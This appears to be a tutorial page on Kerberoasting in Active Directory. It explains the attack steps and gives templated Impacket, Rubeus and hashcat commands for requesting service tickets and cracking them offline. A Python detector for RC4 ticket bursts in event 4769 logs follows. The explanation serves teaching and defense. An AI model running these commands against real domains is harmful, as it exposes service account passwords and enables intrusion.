Kerberoasting
Introduction
Kerberoasting is an attack technique that allows attackers to target service accounts in Active Directory. These service accounts typically have SPNs (Service Principal Names) associated with them.
The attacker can request a Service Ticket for such an account from the Ticket Granting Server; the ticket is encrypted with the password hash of the account that owns the SPN.
The attack takes a few steps:
1. The attacker sends a TGS-REQ request to the Ticket Granting Server.
2. The attacker receives the Service Ticket in the TGS-REP response.
3. The attacker brute-forces the Service Ticket offline to obtain the account's password.
Performing the attack
Impacket
impacket-GetUserSPNs -request -dc-ip <dc_ip> <domain>/<username>
Rubeus
.\Rubeus.exe kerberoast /outfile:<outputfile>
Crack
hashcat -m 13100 <hashes_file> <wordlist>
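On the detection side, the TGS-REQ activity described above is logged on domain controllers as Security event 4769. The following is an added example, not part of the original page: it flags requesters who obtain RC4 tickets (etype 23, the type hashcat mode 13100 targets) for several user-backed service accounts within a short window. The sample events, the `Time` field (seconds), the window and the threshold are constructed assumptions.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value for etype 23


def ev(t, user, svc, etype, status="0x0"):
    """Build a constructed record using event 4769 field names."""
    return {"EventID": 4769, "Time": t, "TargetUserName": user,
            "ServiceName": svc, "TicketEncryptionType": etype, "Status": status}


# Constructed sample data, not real logs.
SAMPLE_EVENTS = [
    ev(0, "alice@CORP.EXAMPLE", "svc_sql", "0x12"),    # normal AES256 ticket
    ev(10, "bob@CORP.EXAMPLE", "svc_sql", "0x17"),     # burst of RC4 requests
    ev(11, "bob@CORP.EXAMPLE", "svc_web", "0x17"),
    ev(12, "bob@CORP.EXAMPLE", "svc_backup", "0x17"),
    ev(13, "bob@CORP.EXAMPLE", "FILE01$", "0x17"),     # machine account, ignored
    ev(20, "carol@CORP.EXAMPLE", "svc_web", "0x17"),   # isolated legacy RC4 use
    ev(900, "carol@CORP.EXAMPLE", "svc_sql", "0x17"),  # outside the window
]


def find_kerberoast_candidates(events, window=300, threshold=3):
    """Return {requester: [services]} for requesters with RC4 tickets for at
    least `threshold` distinct user-backed services within `window` seconds."""
    per_requester = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue  # only successful service ticket requests
        if e["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        # Machine accounts and krbtgt have random passwords; skip them.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_requester[e["TargetUserName"]].append((e["Time"], svc))

    flagged = {}
    for requester, hits in per_requester.items():
        hits.sort()
        start = 0
        for end, (t, _) in enumerate(hits):
            while t - hits[start][0] > window:  # slide the window forward
                start += 1
            services = {s for _, s in hits[start:end + 1]}
            if len(services) >= threshold:
                flagged.setdefault(requester, set()).update(services)
    return {r: sorted(s) for r, s in flagged.items()}
```

Tickets requested with AES encryption types are not matched by this filter, so it covers only the RC4 case.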